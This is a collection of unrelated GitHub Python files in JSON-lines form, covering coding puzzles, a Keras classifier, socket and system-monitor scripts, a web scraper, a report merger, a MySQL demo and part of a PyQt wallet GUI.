+{"seq_id":"29717872637","text":"def nested_list(names_score):\n dic_res = {}\n scores = []\n for data in names_score:\n if data:\n if not data[1] in dic_res:\n dic_res[data[1]] = []\n dic_res[data[1]].append(data[0])\n else:\n dic_res[data[1]].append(data[0])\n scores.append(data[1])\n scores.sort()\n last_score = scores[0]\n for s in scores:\n if last_score != s:\n res_names = dic_res[s]\n break\n res_names.sort()\n return res_names\n \nif __name__ == '__main__':\n names_score = [[]]\n for _ in range(int(input())):\n name = input()\n score = float(input())\n names_score.append(list([name, score]))\n res_list =nested_list(names_score)\n \n for s in res_list:\n print(s)\n \n ","repo_name":"gppprimo/HackerRank_Solutions","sub_path":"Solutions/Nested_list.py","file_name":"Nested_list.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"6302232297","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Apr 2 11:43:01 2022\r\n@author: ctesc\r\n\"\"\"\r\n##### VARIABLES A MODIFIER ######\r\nreset = False # Reset reseau 
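The smile-detection record above shuffles indices and slices ten folds by hand, and it imports joblib from sklearn.externals, which was removed in scikit-learn 0.23 (import joblib directly on modern versions). The manual fold logic is exactly what model_selection.KFold provides; a sketch with placeholder data:

import numpy as np
from sklearn.model_selection import KFold
from sklearn.svm import SVC

X = np.random.rand(100, 16)            # placeholder feature matrix
y = np.random.randint(0, 2, size=100)  # placeholder labels

kf = KFold(n_splits=10, shuffle=True, random_state=0)
for train_idx, test_idx in kf.split(X):
    clf = SVC(kernel='poly', C=4000)   # kernel and C taken from the record
    clf.fit(X[train_idx], y[train_idx])
    print(clf.score(X[test_idx], y[test_idx]))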
neuronnes\r\nnb_hidden = 8 # Nombre neuronnes couche cachee\r\nepochs = 100 # Nombre de batch d entrainement des poids\r\n\r\nimport warnings\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport tensorflow as tf\r\nfrom keras.models import Sequential, load_model\r\nfrom keras.layers import Dense\r\nfrom keras.utils import np_utils\r\nfrom sklearn.preprocessing import StandardScaler, LabelEncoder\r\nwarnings.filterwarnings('ignore')\r\nfull_path='C:/Users/ctesc/OneDrive/Desktop/ml_alexis'\r\nos.chdir('C:/Users/ctesc/OneDrive/Desktop/ml_alexis') #Chemin vers repertoire travail\r\n#os.chdir('C:/Users/AlexisCS/Documents/IA/Projet_CTACRIA') #Chemin vers repertoire travail\r\n#pd.set_option('display.max_row', 100)\r\npd.set_option('display.max_column', 200) #allow to display 200 columns of the dataset: useful to see all features\r\n\r\n#------------------------------------------------------------------------------\r\n# Lecture donnees entree\r\n\r\ndata=pd.read_csv('DN_Full_Voxels_Spectres.csv', sep = ';', decimal=',')\r\nsource = data['Source (MeV)']\r\nvoxels = data['Fantome']\r\n\r\n#------------------------------------------------------------------------------\r\n# Mise en forme des donnees\r\n\r\nencoder = LabelEncoder()\r\nsource_tr = encoder.fit_transform(source)\r\nvoxels_tr = encoder.fit_transform(voxels)\r\nsource_tr = source_tr.reshape((len(source_tr), 1))\r\nvoxels_tr = voxels_tr.reshape((len(source_tr), 1))\r\n\r\nX = np.concatenate((\r\n #source_tr, \r\n voxels_tr, \r\n np.array(data['Pastille 1']).reshape((len(source_tr), 1)), \r\n np.array(data['Pastille 2']).reshape((len(source_tr), 1)), \r\n np.array(data['Pastille 3']).reshape((len(source_tr), 1)), \r\n np.array(data['Pastille 4']).reshape((len(source_tr), 1)), \r\n np.array(data['Pastille 5']).reshape((len(source_tr), 1)), \r\n np.array(data['Pastille 6']).reshape((len(source_tr), 1)),\r\n np.array(data['Moyenne reelle (barns)']).reshape((len(source_tr), 1)),\r\n np.array(data['Ecart type reel']).reshape((len(source_tr), 1))), axis=1)\r\n\r\ny = np.array(data['Angle (degres)'])\r\nscaler = StandardScaler()\r\nX = scaler.fit_transform(X)\r\n\r\nfor i in range(0, len(y)): # Decoupage des valeurs de sorties\r\n if y[i]==360:\r\n y[i] = 0\r\n y[i] = y[i]/15\r\n \r\ndummy_y = np_utils.to_categorical(y)\r\nX_train, X_test, y_train, y_test = train_test_split(X, dummy_y, test_size=.2)\r\n\r\n#------------------------------------------------------------------------------\r\n# Fonction model baseline\r\n\r\ndef baseline_model(nb_hidden=nb_hidden):\r\n model=Sequential()\r\n model.add(Dense(nb_hidden, input_shape=(X.shape[1],), activation = 'relu'))\r\n #model.add(Dense(8, activation = 'relu'))\r\n model.add(Dense(24, activation = 'softmax'))\r\n \r\n myOpt = tf.keras.optimizers.Adam(learning_rate=0.0005, name='Adam')\r\n model.compile(loss='categorical_crossentropy', optimizer = myOpt, \r\n metrics = ['accuracy'])\r\n # global train_loss\r\n # global val_loss\r\n # global train_acc\r\n # global val_acc\r\n # train_loss = []\r\n # val_loss = []\r\n # train_acc = []\r\n # val_acc = []\r\n \r\n return model\r\n\r\n#------------------------------------------------------------------------------\r\n# Entrainement resultats\r\n\r\ndef train(reset, epochs=epochs, nb_hidden=nb_hidden):\r\n filename = f'model_{nb_hidden}/model_{nb_hidden}_save'\r\n if reset:\r\n model = baseline_model(nb_hidden)\r\n else:\r\n model = load_model(filename)\r\n \r\n \r\n memory = model.fit(X_train, y_train, 
epochs=epochs, batch_size=64, \r\n validation_data=(X_test, y_test), shuffle=True, verbose=1)\r\n model.save(filename)\r\n if reset:\r\n hist = pd.DataFrame(memory.history)\r\n with open(filename+'_history.csv', mode='w') as f:\r\n hist.to_csv(f)\r\n else :\r\n hist = pd.DataFrame(memory.history)\r\n with open(filename+'_history.csv', mode='a') as f:\r\n hist.to_csv(f, header=False)\r\n return memory.history\r\n\r\n#------------------------------------------------------------------------------\r\n# Analyse des resultats\r\n\r\ndef update_metrics(reset, epochs=100):\r\n# =============================================================================\r\n# global train_loss\r\n# global val_loss\r\n# global train_acc\r\n# global val_acc\r\n# global memory\r\n# =============================================================================\r\n filename = f'model_{nb_hidden}/model_{nb_hidden}_save'\r\n memory = train(epochs=epochs, reset = reset)\r\n #print(np.array(memory.history['loss']))\r\n # train_loss = [float(i) for i in train_loss]\r\n # val_loss = [float(i) for i in val_loss]\r\n # train_acc = [float(i) for i in train_acc]\r\n # val_acc = [float(i) for i in val_acc]\r\n # train_loss.append(history.history['loss'])\r\n # val_loss.append(history.history['val_loss'])\r\n # train_acc.append(history.history['accuracy'])\r\n # val_acc.append(history.history['val_accuracy']) \r\n if reset:\r\n train_loss = memory['loss']\r\n val_loss = memory['val_loss']\r\n train_acc = memory['accuracy']\r\n val_acc = memory['val_accuracy']\r\n else:\r\n hist = pd.read_csv(filename+'_history.csv')\r\n train_loss = hist.loss\r\n val_loss = hist.val_loss\r\n train_acc = hist.accuracy\r\n val_acc = hist.val_accuracy\r\n# =============================================================================\r\n# new_train_loss = np.array(memory['loss'])\r\n# new_train_loss = new_train_loss.reshape((new_train_loss.shape[0], 1))\r\n# old_train_loss = np.array(hist.loss)\r\n# old_train_loss = old_train_loss.reshape((old_train_loss.shape[0], 1))\r\n# train_loss = np.concatenate((old_train_loss, \r\n# new_train_loss), axis=0)\r\n# new_val_loss = np.array(memory['val_loss'])\r\n# new_val_loss = new_val_loss.reshape((new_val_loss.shape[0], 1))\r\n# old_val_loss = np.array(hist.val_loss)\r\n# old_val_loss = old_val_loss.reshape((old_val_loss.shape[0], 1))\r\n# val_loss = np.concatenate((old_val_loss, \r\n# new_val_loss), axis=0)\r\n# new_train_acc = np.array(memory['accuracy'])\r\n# new_train_acc = new_train_acc.reshape((new_train_acc.shape[0], 1))\r\n# old_train_acc = np.array(hist.accuracy)\r\n# old_train_acc = old_train_acc.reshape((old_train_acc.shape[0], 1))\r\n# train_acc = np.concatenate((old_train_acc, \r\n# new_train_acc), axis=0)\r\n# new_val_acc = np.array(memory['val_accuracy'])\r\n# new_val_acc = new_val_acc.reshape((new_val_acc.shape[0], 1))\r\n# old_val_acc = np.array(hist.val_accuracy)\r\n# old_val_acc = old_val_acc.reshape((old_val_acc.shape[0], 1))\r\n# val_acc = np.concatenate((old_val_acc, \r\n# new_val_acc), axis=0)\r\n# =============================================================================\r\n\r\n\r\n # train_loss = np.array(train_loss)\r\n # val_loss = np.array(val_loss)\r\n # train_acc = np.array(train_acc)\r\n # val_acc = np.array(val_acc)\r\n # train_loss = train_loss.reshape((train_loss.shape[0], 1))\r\n # val_loss = val_loss.reshape((val_loss.shape[0], 1))\r\n # train_acc = train_acc.reshape((train_acc.shape[0], 1))\r\n # val_acc = val_acc.reshape((val_acc.shape[0], 1))\r\n frame = {'train_loss': 
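A note mid-record: the Reseau_V1.4.py file above appends training history to a CSV by hand after each fit. Keras ships a CSVLogger callback that writes the same metrics once per epoch; a sketch assuming the record's model and data are in scope, with an illustrative output path:

from tensorflow.keras.callbacks import CSVLogger

history_logger = CSVLogger('model_8/model_8_history.csv', append=True)
model.fit(X_train, y_train,
          epochs=100, batch_size=64,
          validation_data=(X_test, y_test),
          callbacks=[history_logger])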
train_loss, 'val_loss':val_loss, 'train_acc':train_acc, 'val_acc':val_acc}\r\n metrics = pd.DataFrame(frame)\r\n print(metrics)\r\n \r\n return metrics\r\n\r\n#------------------------------------------------------------------------------\r\n# Trace des graphes\r\n\r\ndef graphs(reset, epochs=100, nb_hidden=nb_hidden):\r\n metrics = update_metrics(reset=reset, epochs=epochs)\r\n plt.figure(figsize=(12,8))\r\n plt.plot(metrics['val_acc'], label='val acc')\r\n plt.plot(metrics['train_acc'], label = 'train acc')\r\n plt.legend()\r\n plt.savefig(f'model_{nb_hidden}/accuracy_{nb_hidden}.png', dpi=200)\r\n \r\n plt.figure(figsize=(12,8))\r\n plt.plot(metrics['val_loss'], label='val loss')\r\n plt.plot(metrics['train_loss'], label = 'train loss')\r\n plt.legend()\r\n plt.savefig(f'model_{nb_hidden}/loss_{nb_hidden}.png', dpi=200)\r\n \r\n return ","repo_name":"FrankLloyd83/CTACSIA","sub_path":"Reseau_V1.4.py","file_name":"Reseau_V1.4.py","file_ext":"py","file_size_in_byte":8607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"12467206488","text":"import socket\r\n\r\ndef Main():\r\n host='192.168.0.106'\r\n port=6000\r\n\r\n s=socket.socket()\r\n\r\n data='order food'\r\n print('file ot to send')\r\n s.connect((host,port))\r\n s.send(data.encode('utf-8'))\r\n chatbot_ip=s.recv(1024).decode('utf-8')\r\n print('data recv: ',chatbot_ip)\r\n print(type(chatbot_ip))\r\n s.close()\r\n\r\n host = '192.168.0.109'\r\n port = 5000\r\n\r\n s = socket.socket()\r\n print('socket done')\r\n data = 'order food'\r\n print('file ot to send')\r\n s.connect((host, port))\r\n s.send(data.encode('utf-8'))\r\n result = s.recv(1024).decode('utf-8')\r\n print('data recv: ', result)\r\n s.close()\r\n\r\n\r\n\r\nif __name__=='__main__':\r\n Main()","repo_name":"sharvi1011/Social-networking-for-chatbots","sub_path":"ui2mdel.py","file_name":"ui2mdel.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"23751264311","text":"#!/usr/bin/python\n\nimport re\nimport os\n\nvoltage_re = re.compile(r'(\\d+.\\d+) V')\ncurrent_re = re.compile(r'(\\d+.\\d+) (m?A)')\n\n# Reference\n# https://techbase.kde.org/Development/Tutorials/Sensors\n\n# path\n# /home/pedrovdsc/Projects/Power Plotter/power_plotter.py\nif __name__ == '__main__':\n print('ksysguardd 1.2.0')\n while True:\n request = input('ksysguardd> ')\n\n stream = os.popen('sensors')\n output = stream.read()\n\n voltage_str = voltage_re.findall(output)[0]\n current_str, current_sufix = current_re.findall(output)[0]\n\n voltage = float(voltage_str)\n current = float(current_str) * (1 if 'm' in current_sufix else 1000)\n power = voltage * current / 1000\n\n if request == 'monitors':\n print('Voltage\\tfloat')\n print('Current\\tfloat')\n print('Power\\tfloat')\n elif request == 'Voltage':\n print(voltage)\n elif request == 'Voltage?':\n print('voltage\\t10\\t14\\tV')\n elif request == 'Current':\n print(current)\n elif request == 'Current?':\n print('current\\t0\\t3000\\tmA')\n elif request == 'Power':\n print(power)\n elif request == 'Power?':\n print('power\\t0\\t45\\tW')","repo_name":"pedrovdsc/acer-swift","sub_path":"Power Monitor/power_monitor.py","file_name":"power_monitor.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"32396370084","text":"#!python3\nimport os\nimport sys\n\n\ndef stop():\n cmd = 'ps ax | 
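The socket client record above (ui2mdel.py) opens raw sockets and closes them manually, so an exception leaks the descriptor. socket.create_connection plus a with block handles resolution, connection and cleanup in one place; a sketch reusing the record's first host and port:

import socket

def send_message(host, port, message):
    # the connected socket is closed automatically, even on error
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(message.encode('utf-8'))
        return s.recv(1024).decode('utf-8')

print('data recv:', send_message('192.168.0.106', 6000, 'order food'))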
grep \"cc_clipboard_script.py\"'\n print(\"$\", cmd)\n o = os.popen(cmd).read()\n print(o)\n cmd = f\"kill {o.split(' ')[0]}\"\n print(\"$\", cmd)\n print(os.popen(cmd).read())\n\n\ndef start():\n stop()\n cmd = 'nohup python3 cc_clipboard_script.py > cc.log &'\n print(\"$\", cmd)\n print(os.popen(cmd).read())\n\n\ndef main():\n print()\n args = sys.argv[1]\n if args == \"start\":\n\n start()\n elif args == \"stop\":\n stop()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"sssr-dev/cc-clipboard","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"2769180833","text":"from bs4 import BeautifulSoup\nfrom urllib2 import urlopen\nimport csv\nimport time\n\n# function to parse web page\ndef make_soup(url):\n\thtml = urlopen(url).read()\n\treturn BeautifulSoup(html,\"lxml\")\n\nif __name__ == '__main__':\n\n\tlinks = []\n\n\t# gets all links to missing person profiles\n\tfor i in range(1,21,1):\n\t\turl_to_scrape = \"http://missingpersons.police.uk/en/search/\" + str(i)\n\t\tsoup = make_soup(url_to_scrape)\n\t\tbodies = soup.findAll(\"li\", \"Highlight\")\n\t\tfor body in bodies:\n\t\t\tlinks.append(\"http://missingpersons.police.uk\" + body.a[\"href\"])\n\t\ttime.sleep(1)\n\n\t# gets details from each link and writes to csv\n\twith open(\"bodies.csv\", 'w') as outfile:\n\t\tnew_file = csv.writer(outfile)\n\t\tnew_file.writerow([\"id\", \"status\", \"source\", \"gender\", \"age\", \"ethnicity\", \"height\", \"build\", \"date\", \"circumstances\"])\n\t\t\n\t\tid_no = 0\n\n\t\tfor link in links: \n\t\t\tid_no += 1\n\t\t\t\n\t\t\ttry:\n\t\t\t\tsoup = make_soup(link)\n\t\t\t\ttime.sleep(1)\n\t\t\t\tcells = soup.findAll(\"td\")\n\t\t\t\tgender = cells[1].string\n\t\t\t\tage = cells[3].string\n\t\t\t\tethnicity = cells[5].string\n\t\t\t\theight = cells[7].string\n\t\t\t\tbuild = cells[9].string\n\t\t\t\tdate = cells[11].string\n\t\t\t\tcircumstances = soup.find('p').string\n\t\t\t\tnew_file.writerow([id_no, \"ok\", link, gender, age, ethnicity, height, build, date, circumstances])\n\t\t\t\t\n\t\t\texcept:\n\t\t\t\tnew_file.writerow([id_no, \"failed\", link])\n\n\t\t\n\tif not outfile.closed:\n\t\toutfile.close()\n","repo_name":"patrickescott/unidentified-bodies-python-scraper","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"21493063141","text":"import math\n\nwith open('2022/puzzle_inputs/25.txt') as file:\n strInput = file.read()\n\ntest_strInput = \"\"\"1=-0-2\n12111\n2=0=\n21\n2=01\n111\n20012\n112\n1=-1=\n1-12\n12\n1=\n122\"\"\"\n\n# split list\n# convert each base 5 number to decimal\n## decode each position and multiply by the corresponding value\n# sum the numbers \n# then convert back to base 5\n\n\ndef decode(b5_str):\n \"\"\"\n Convert string representation of base 5 to decimal integer\n \"\"\"\n decoder = {'2':2,'1':1,'0':0,'-':-1,'=':-2}\n decimal = 0\n for i, component in enumerate(b5_str[::-1]):\n decimal += ((5**i)*decoder[component])\n return decimal\n\ndef encode(decimal):\n # need to factor the number\n # encoder = \n result = decimal\n b5_str = \"\"\n while result != 0:\n quotient = result / 5\n remainder = round(5*(quotient - math.floor(quotient)),1)\n # now I need to account for having -2 to 2 not 0-5\n b5_str += str(int(remainder))\n result = int(quotient)\n\n # so a 3 in one 
position gets turned into\n b5_str_aug = [x for x in b5_str]\n for i in range(len(b5_str_aug)):\n value = b5_str_aug[i]\n if int(value) == 3:\n b5_str_aug[i] = \"=\"\n try:\n b5_str_aug[i+1] = str(int(b5_str_aug[i+1]) + 1)\n except:\n b5_str_aug.append(\"1\")\n elif int(value) == 4:\n b5_str_aug[i] = \"-\"\n try:\n b5_str_aug[i+1] = str(int(b5_str_aug[i+1]) + 1)\n except:\n b5_str_aug.append(\"1\")\n else:\n continue\n return ''.join(b5_str_aug)[::-1]\n\ndef main(input):\n b5_list = [x for x in input.split('\\n') if x != '']\n decimals = []\n for b5_str in b5_list:\n decimals.append(decode(b5_str))\n \n sum_decimals = sum(decimals)\n return encode(sum_decimals)\n\n\n\nif __name__ == '__main__':\n print(main(strInput))\n","repo_name":"cgbledsoe/advent_of_code","sub_path":"2022/25.py","file_name":"25.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41887249606","text":"\"\"\"Merge all available pipeline reports into a single HTML file.\"\"\"\n####\n#### Merge all available pipeline reports into a single HTML file.\n####\n#### Example usage to analyze \"whatever\":\n#### python3 merge-all-reports.py --help\n#### mkdir -p /tmp/mnt || true\n#### mkdir -p /tmp/foo || true\n#### sshfs -oStrictHostKeyChecking=no -o IdentitiesOnly=true -o IdentityFile=/home/sjcarbon/local/share/secrets/bbop/ssh-keys/foo.skyhook -o idmap=user skyhook@skyhook.berkeleybop.org:/home/skyhook /tmp/mnt/\n#### cp /tmp/mnt/master/reports/whatever* /tmp/foo\n#### fusermount -u /tmp/mnt\n#### python3 merge-all-reports.py -v -d /tmp/foo\n####\n\nimport sys\nimport argparse\nimport logging\nimport glob\nimport os\nimport subprocess\nimport markdown\n\n## Logger basic setup.\nlogging.basicConfig(level=logging.INFO)\nLOGGER = logging.getLogger('merge')\nLOGGER.setLevel(logging.WARNING)\n\n## Make sure we exit in a way that will get Jenkins's attention.\nDIED_SCREAMING_P = False\n\ndef die_screaming(string):\n \"\"\" Die and take our toys home. 
\"\"\"\n global DIED_SCREAMING_P\n LOGGER.error(string)\n DIED_SCREAMING_P = True\n #sys.exit(1)\n\ndef main():\n\n ## Deal with incoming.\n parser = argparse.ArgumentParser(\n description=__doc__,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n parser.add_argument('-d', '--directory',\n help='The directory to act on')\n parser.add_argument('-v', '--verbose', action='store_true',\n help='More verbose output')\n args = parser.parse_args()\n\n ## Get logger doing something.\n if args.verbose:\n LOGGER.setLevel(logging.INFO)\n LOGGER.info('Verbose: on')\n\n ## Ensure directory.\n if not args.directory:\n die_screaming('need a directory argument')\n LOGGER.info('Will operate in: ' + args.directory)\n\n ids = []\n\n ## Get files out of target directory, searching for the IDs\n ## independent of the metadata.\n src_filenames = glob.glob(args.directory + '/*.report.md')\n LOGGER.info(src_filenames)\n for src_filename in src_filenames:\n ## Chop off all extensions.\n potential_id = src_filename\n ## I don't know what extensions we'll be using in the future,\n ## so just chop everything off.\n while os.path.splitext(potential_id)[1] != '':\n potential_id = os.path.splitext(potential_id)[0]\n ## Trim off the path.\n potential_id = os.path.basename(potential_id)\n ids.append(potential_id)\n\n ## TODO: Check found resources versus metadata.\n LOGGER.info('Found ' + str(len(ids)) + ' resource(s).')\n\n ## Now that we have IDs, start the great concatenation.\n lookup = {}\n for aid in ids:\n\n ###\n ### Read and munge all the files we'll put together.\n ###\n\n LOGGER.info(\"Processing: \" + aid)\n\n ##\n rmd_p = False\n rmd_data = 'No report generated.'\n rmd_fname = args.directory + '/' + aid + '.report.md'\n if os.path.isfile(rmd_fname):\n with open(rmd_fname) as fileh:\n rmd_data = fileh.read()\n rmd_p = True\n\n ##\n # otc_p = False\n # otc_data = 'No report generated.'\n # otc_fname = args.directory + '/' + aid + '-owltools-check.txt'\n # if os.path.isfile(otc_fname):\n # with open(otc_fname) as fileh:\n # otc_data = fileh.read()\n # otc_p = True\n\n ##\n # sum_p = False\n # sum_data = 'No report generated.'\n # sum_fname = args.directory + '/' + aid + '-summary.txt'\n # if os.path.isfile(sum_fname):\n # with open(sum_fname) as fileh:\n # sum_data = fileh.read()\n # sum_p = True\n\n ##\n pre_p = False\n pre_data = 'No report generated.'\n pre_fname = args.directory + '/' + aid + '-prediction-report.txt'\n if os.path.isfile(pre_fname):\n with open(pre_fname) as fileh:\n pre_data = fileh.read()\n pre_p = True\n\n ##\n epr_p = False\n epr_data = 'No report generated.'\n epr_fname = args.directory + '/' + aid + '-prediction-experimental-report.txt'\n if os.path.isfile(epr_fname):\n with open(epr_fname) as fileh:\n epr_data = fileh.read()\n epr_p = True\n\n # ###\n # ### Extract information from actual using grep.\n # ### grep EXIT STATUS\n # ### The following exit values are returned:\n # ### 0 One or more matches were found.\n # ### 1 No matches were found.\n # ### 2 Syntax errors or inaccessible files (even if matches were found).\n # ###\n\n # ## Get source count.\n # foo = subprocess.run(\n # 'zgrep -Ec \"$\" ' + args.directory + '/' + aid + '-src.gaf.gz',\n # shell=True, check=False, stdout=subprocess.PIPE)\n # if type(foo) is not subprocess.CompletedProcess:\n # die_screaming('Shell fail on: ' + str(foo))\n # elif foo.returncode == 2:\n # die_screaming('Bad file on: ' + str(foo))\n # count_gaf_src = int(foo.stdout)\n\n ## Output file.\n with open(args.directory + '/' + aid + 
'-report.html', 'w') as f:\n            f.write('<html>\\n')\n            f.write('<body>\\n')\n\n            f.write('<h1>Table of contents</h1>\\n')\n            f.write('<div>\\n')\n            f.write('<ul>\\n')\n            f.write('<li>\\n')\n            f.write('<a href=\"#report\">Report</a>')\n            if rmd_p:\n                f.write(' (<a href=\"' + aid + '.report.md\">original</a>)\\n')\n            else:\n                f.write(' \\n')\n            f.write('</li>\\n')\n            f.write('<li>\\n')\n            f.write('<a href=\"#predictions\">Predictions</a>')\n            if pre_p:\n                f.write(' (<a href=\"' + aid + '-prediction-report.txt\">original</a>)\\n')\n            else:\n                f.write(' \\n')\n            f.write('</li>\\n')\n            f.write('<li>\\n')\n            f.write('<a href=\"#predictions-experimental\">Predictions (experimental)</a>')\n            if epr_p:\n                f.write(' (<a href=\"' + aid + '-prediction-experimental-report.txt\">original</a>)\\n')\n            else:\n                f.write(' \\n')\n            f.write('</li>\\n')\n            f.write('</ul>\\n')\n            f.write('</div>\\n')\n\n            f.write('<h1 id=\"report\">Report</h1>\\n')\n            f.write('<div>\\n')\n            f.write(markdown.markdown(rmd_data, extensions=[\"markdown.extensions.headerid\"]))\n            #f.write(rmd_data)\n            f.write('\\n')\n            f.write('</div>\\n')\n\n            f.write('<h1 id=\"predictions\">Predictions</h1>\\n')\n            f.write('<div>\\n')\n            f.write(pre_data.replace(\"\\n\",\"<br/>\\n\"))\n            f.write('\\n')\n            f.write('</div>\\n')\n\n            f.write('<h1 id=\"predictions-experimental\">Predictions (experimental)</h1>\\n')\n            f.write('<div>\\n')\n            f.write(epr_data.replace(\"\\n\",\"<br/>\\n\"))\n            f.write('\\n')\n            f.write('</div>\\n')
\n\n            f.write('</body>\\n')\n            f.write('</html>\\n')\n            f.closed\n\n    ## Close out if everything went okay.\n    if DIED_SCREAMING_P:\n        LOGGER.info('Errors happened.')\n        sys.exit(1)\n    else:\n        LOGGER.info('All passing.')\n\n\n## You saw it coming...\nif __name__ == '__main__':\n    main()\n","repo_name":"geneontology/go-site","sub_path":"scripts/merge-all-reports.py","file_name":"merge-all-reports.py","file_ext":"py","file_size_in_byte":7446,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"35"}
+{"seq_id":"24501236305","text":"import mysql.connector\r\n\r\nveritab = mysql.connector.connect(\r\n    host = \"localhost\",\r\n    user =\"root\",\r\n    passwd = \"\",\r\n    database = \"first_demo\"\r\n)\r\nsayi= int(input(\" How many records do you want to add \"))\r\n\r\nfor i in range (sayi):\r\n    ad =input(\"enter your name\")\r\n    yer = input(\"enter your address \")\r\n\r\n\r\nmycursor = veritab.cursor()\r\n\r\nsorgu = \"INSERT INTO employees_3 (name,address) VALUES (%s,%s)\"\r\n\r\ndeger = [\r\n    (\"Ekrem\", \"İstanbul No:15\"),\r\n    (\"Mansur\", \"Ankara No:64\"),\r\n    (\"Ayşe\", \"İzmir No:67\"),\r\n    (\"Deniz\", \"Bodrum No:41\"),\r\n    (\"Melih\", \"Trabzon No:61\"),\r\n    (\"Onur\", \"Hatay No:45\"),\r\n]\r\n\r\nmycursor.executemany(sorgu,deger)\r\n\r\nveritab.commit()\r\n\r\nprint(mycursor.rowcount, \"record(s) added.\")\r\n\r\n\r\n","repo_name":"hasan-ylmz/Python-School","sub_path":"python database-sql/çoklu veri_2.py","file_name":"çoklu veri_2.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"44247412565","text":"import json\r\nimport os\r\nimport pathlib\r\nimport platform\r\nimport sys\r\nimport time\r\nimport webbrowser\r\nimport logging\r\nimport qrcode\r\nfrom datetime import datetime, timedelta\r\nfrom qr_code_gen import Image\r\nfrom PyQt5 import QtWidgets, QtCore, QtChart\r\nfrom PyQt5.QtGui import QIcon, QRegExpValidator, QFont, QPainter, QFontDatabase\r\nfrom PyQt5.QtChart import QChart, QChartView, QPieSeries\r\nfrom PyQt5.QtCore import QThread, pyqtSlot, QDateTime, QSize, Qt, QTranslator, QRegExp\r\nfrom PyQt5.QtWidgets import QMainWindow, QPushButton, QTableWidgetItem, QMessageBox, QDesktopWidget, QHeaderView, \\\r\n    QDialog, QDialogButtonBox, QVBoxLayout, QGridLayout, QToolTip, QHBoxLayout, QFileDialog\r\nimport configuration\r\nimport marmarachain_rpc\r\nimport api_request\r\nimport remote_connection\r\nimport chain_args as cp\r\nimport qtguistyle\r\nfrom Loading import LoadingScreen\r\nimport qtawesome as qta\r\nfrom fbs_runtime.application_context.PyQt5 import ApplicationContext\r\n\r\nlogging.getLogger(__name__)\r\n\r\n\r\nclass MarmaraMain(QMainWindow, qtguistyle.GuiStyle):\r\n\r\n    def __init__(self, parent=None):\r\n        super(MarmaraMain, self).__init__(parent)\r\n        # Default Settings\r\n        self.trans = QTranslator(self)\r\n        self.retranslateUi(self)\r\n        self.default_fontsize = 12\r\n        self.get_default_fontsize()\r\n        self.set_font_size(self.default_fontsize)\r\n        self.main_tab.setCurrentIndex(0)\r\n        self.main_tab.tabBar().setVisible(False)\r\n        self.login_stackedWidget.setCurrentIndex(0)\r\n        self.home_button.setVisible(False)\r\n        self.chain_status = False\r\n        self.chain_synced = False\r\n        self.pubkey_status = False\r\n        self.center_ui()\r\n        self.selected_stylesheet = \"\"\r\n        self.get_initial_style_settings()\r\n        self.read_lang_setting()\r\n        self.set_tooltip_texts()\r\n        self.get_balance_hide()\r\n        # paths settings\r\n        # Menu Actions\r\n        self.actionAbout.triggered.connect(self.show_about)\r\n        self.actionLogout.triggered.connect(self.logout_host)\r\n        self.actionLanguage_Selection.triggered.connect(self.show_languages)\r\n        
self.actionConsole.setVisible(False)\n self.actionConsole.triggered.connect(self.open_debug_console)\n self.actionSee_Log_File.triggered.connect(self.open_log_file)\n self.actionSee_chain_Log_File.triggered.connect(self.open_chain_log_file)\n self.actionCheck_for_Update.triggered.connect(self.check_app_version)\n self.actionAppearances.triggered.connect(self.show_style_themes)\n # Login page Host Selection\n self.local_button.clicked.connect(self.local_selection)\n self.remote_button.clicked.connect(self.remote_selection)\n # Login page Server authentication\n self.home_button.clicked.connect(self.host_selection)\n self.serveradd_button.clicked.connect(self.server_add_selected)\n self.connect_button.clicked.connect(self.server_connect)\n self.serverpw_lineEdit.returnPressed.connect(self.server_connect)\n self.serveredit_button.clicked.connect(self.server_edit_selected)\n self.regex = QRegExp(\"[1-90_]{1,5}\")\n self.validator = QRegExpValidator(self.regex)\n self.ssh_port_lineEdit.setValidator(self.validator)\n self.ssh_port_lineEdit.setText('22')\n self.ssh_port_checkBox.clicked.connect(self.enable_ssh_custom_port)\n # install page\n self.start_install_button.clicked.connect(self.start_autoinstall)\n self.sudo_password_lineEdit.returnPressed.connect(self.start_autoinstall)\n ## Add Server Settings page\n self.add_serversave_button.clicked.connect(self.save_server_settings)\n self.servercancel_button.clicked.connect(self.add_cancel_selected)\n ## Edit Server Settings page\n self.edit_serversave_button.clicked.connect(self.edit_server_settings)\n self.serverdelete_button.clicked.connect(self.delete_server_setting)\n # MCL tabwidget\n self.mcl_tab.currentChanged.connect(self.mcl_tab_changed)\n # side panel\n self.copyaddress_button.clicked.connect(self.copyaddress_clipboard)\n self.copypubkey_button.clicked.connect(self.copypubkey_clipboard)\n self.staking_button.setChecked(False)\n self.staking_button.clicked.connect(self.toggle_staking)\n self.mining_button.setChecked(False)\n # self.regex = QRegExp(\"[1-90_]{1,4}\")\n # self.validator = QRegExpValidator(self.regex)\n self.cpu_core_lineEdit.setValidator(self.validator)\n self.cpu_core_selection_off()\n 